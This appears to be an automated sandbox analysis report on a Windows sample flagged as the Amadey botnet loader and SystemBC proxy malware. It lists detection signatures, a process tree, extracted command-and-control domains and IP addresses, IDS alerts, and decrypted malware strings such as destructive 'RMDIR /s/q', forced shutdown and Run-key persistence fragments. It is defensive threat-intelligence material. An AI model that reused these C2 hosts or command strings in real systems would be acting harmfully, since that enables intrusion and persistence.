Edit tour

Windows Analysis Report
XO4ioEY3nq.exe

Overview

General Information

Sample name:	XO4ioEY3nq.exe renamed because original name is a hash value
Original sample name:	73636685f823d103c54b30bc457c7f0d.exe
Analysis ID:	1627459
MD5:	73636685f823d103c54b30bc457c7f0d
SHA1:	597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256:	1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, SystemBC

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected SystemBC

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Potentially malicious time measurement code found

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

XO4ioEY3nq.exe (PID: 6076 cmdline: "C:\Users\user\Desktop\XO4ioEY3nq.exe" MD5: 73636685F823D103C54B30BC457C7F0D)

Gxtuum.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: 73636685F823D103C54B30BC457C7F0D)

rundrive.exe (PID: 6176 cmdline: "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe" MD5: 9218E5CAD03C752F237ED87A9E52DEF4)

Gxtuum.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)

eafkou.exe (PID: 6520 cmdline: C:\ProgramData\rcjuo\eafkou.exe MD5: 9218E5CAD03C752F237ED87A9E52DEF4)

Gxtuum.exe (PID: 6500 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)

Gxtuum.exe (PID: 2584 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)

Gxtuum.exe (PID: 3688 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)

Gxtuum.exe (PID: 3716 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
SystemBC	SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.	No Attribution	https://asec.ahnlab.com/en/33600/ https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight	https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Malware Configuration

Threatname: Amadey

{"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}

Threatname: SystemBC

{"HOST1": "towerbingobongoboom.com", "HOST2": "213.209.150.137"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
XO4ioEY3nq.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
Process Memory Space: rundrive.exe PID: 6176	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
Process Memory Space: eafkou.exe PID: 6520	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security

Unpacked PEs

Source	Rule	Description	Author
8.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
7.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
10.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
10.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
7.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
9.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.XO4ioEY3nq.exe.70000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.0.XO4ioEY3nq.exe.70000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
9.0.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
8.2.Gxtuum.exe.8d0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 9 entries

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-02T13:15:16.934308+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49704	107.189.27.66	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-02T13:15:19.077288+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49705	107.189.27.66	80	TCP
2025-03-02T13:15:38.193887+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49758	107.189.27.66	80	TCP
2025-03-02T13:15:42.592965+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49790	107.189.27.66	80	TCP
2025-03-02T13:15:46.951710+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61684	107.189.27.66	80	TCP
2025-03-02T13:15:51.286074+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61716	107.189.27.66	80	TCP
2025-03-02T13:15:55.810462+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61740	107.189.27.66	80	TCP
2025-03-02T13:16:00.168902+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61772	107.189.27.66	80	TCP
2025-03-02T13:16:04.690691+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61804	107.189.27.66	80	TCP
2025-03-02T13:16:09.048275+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61834	107.189.27.66	80	TCP
2025-03-02T13:16:13.379738+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61862	107.189.27.66	80	TCP
2025-03-02T13:16:17.751981+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61864	107.189.27.66	80	TCP
2025-03-02T13:16:22.141775+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61866	107.189.27.66	80	TCP
2025-03-02T13:16:26.613810+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61868	107.189.27.66	80	TCP
2025-03-02T13:16:30.967145+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61870	107.189.27.66	80	TCP
2025-03-02T13:16:35.332293+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61872	107.189.27.66	80	TCP
2025-03-02T13:16:39.700458+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61874	107.189.27.66	80	TCP
2025-03-02T13:16:44.080935+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61876	107.189.27.66	80	TCP
2025-03-02T13:16:48.456566+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61878	107.189.27.66	80	TCP
2025-03-02T13:16:52.819517+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61880	107.189.27.66	80	TCP
2025-03-02T13:16:57.271130+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61882	107.189.27.66	80	TCP
2025-03-02T13:17:01.652078+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61884	107.189.27.66	80	TCP
2025-03-02T13:17:06.065993+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61886	107.189.27.66	80	TCP
2025-03-02T13:17:10.578393+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61888	107.189.27.66	80	TCP
2025-03-02T13:17:15.002537+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61890	107.189.27.66	80	TCP
2025-03-02T13:17:19.369440+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61892	107.189.27.66	80	TCP
2025-03-02T13:17:23.752294+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61894	107.189.27.66	80	TCP
2025-03-02T13:17:28.090740+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61896	107.189.27.66	80	TCP
2025-03-02T13:17:32.486039+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61898	107.189.27.66	80	TCP
2025-03-02T13:17:36.892451+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61900	107.189.27.66	80	TCP
2025-03-02T13:17:41.275660+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61902	107.189.27.66	80	TCP
2025-03-02T13:17:45.666257+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61904	107.189.27.66	80	TCP
2025-03-02T13:17:50.019126+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61906	107.189.27.66	80	TCP
2025-03-02T13:17:54.392231+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61908	107.189.27.66	80	TCP
2025-03-02T13:17:58.791128+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61910	107.189.27.66	80	TCP
2025-03-02T13:18:03.166543+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61912	107.189.27.66	80	TCP
2025-03-02T13:18:07.616960+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61914	107.189.27.66	80	TCP
2025-03-02T13:18:11.973686+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61916	107.189.27.66	80	TCP
2025-03-02T13:18:16.382226+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61918	107.189.27.66	80	TCP
2025-03-02T13:18:20.769244+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61920	107.189.27.66	80	TCP
2025-03-02T13:18:25.135343+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61922	107.189.27.66	80	TCP
2025-03-02T13:18:29.472363+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61924	107.189.27.66	80	TCP
2025-03-02T13:18:34.165326+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61926	107.189.27.66	80	TCP
2025-03-02T13:18:38.570650+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61928	107.189.27.66	80	TCP
2025-03-02T13:18:42.948676+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61930	107.189.27.66	80	TCP
2025-03-02T13:18:47.321810+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61932	107.189.27.66	80	TCP
2025-03-02T13:18:51.750178+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61934	107.189.27.66	80	TCP
2025-03-02T13:18:56.178261+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61936	107.189.27.66	80	TCP
2025-03-02T13:19:00.654904+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61938	107.189.27.66	80	TCP
2025-03-02T13:19:05.058313+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61940	107.189.27.66	80	TCP
2025-03-02T13:19:09.457697+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61942	107.189.27.66	80	TCP
2025-03-02T13:19:13.842864+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61944	107.189.27.66	80	TCP
2025-03-02T13:19:18.380076+0100	2856148	1	A Network Trojan was detected	192.168.2.5	61946	107.189.27.66	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-02T13:15:21.359962+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	45.59.120.8	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: towerbingobongoboom.com	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php7m	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpiYl	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpx	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpim	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpFm	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpV?	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpir	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php&	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpe	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpxm	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php6l	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpi	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phphl	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpY	Avira URL Cloud: Label: malware
Source: cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: XO4ioEY3nq.exe	Malware Configuration Extractor: Amadey {"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
Source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "213.209.150.137"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: XO4ioEY3nq.exe	Virustotal: Detection: 61%			Perma Link
Source: XO4ioEY3nq.exe	ReversingLabs: Detection: 73%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: /3ofn3jf3e2ljk/index.php
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cobolrationumelawrtewarms.com
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: a58456755d
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Gxtuum.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String decryptor: CurrentBuild

Source: XO4ioEY3nq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: XO4ioEY3nq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000AF011 FindFirstFileExW,	0_2_000AF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0090F011 FindFirstFileExW,	1_2_0090F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_0090F011 FindFirstFileExW,	2_2_0090F011

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49705 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49704 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49758 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61684 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49790 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61740 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61716 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61772 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61804 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61834 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61868 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61864 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61890 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61876 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61884 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61888 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61886 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61898 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61912 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61870 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61916 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61940 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61896 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61930 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61900 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61906 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61866 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61878 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61882 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61892 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61904 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61920 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61862 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61874 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61914 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61922 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61872 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61944 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61902 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61928 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61946 -> 107.189.27.66:80
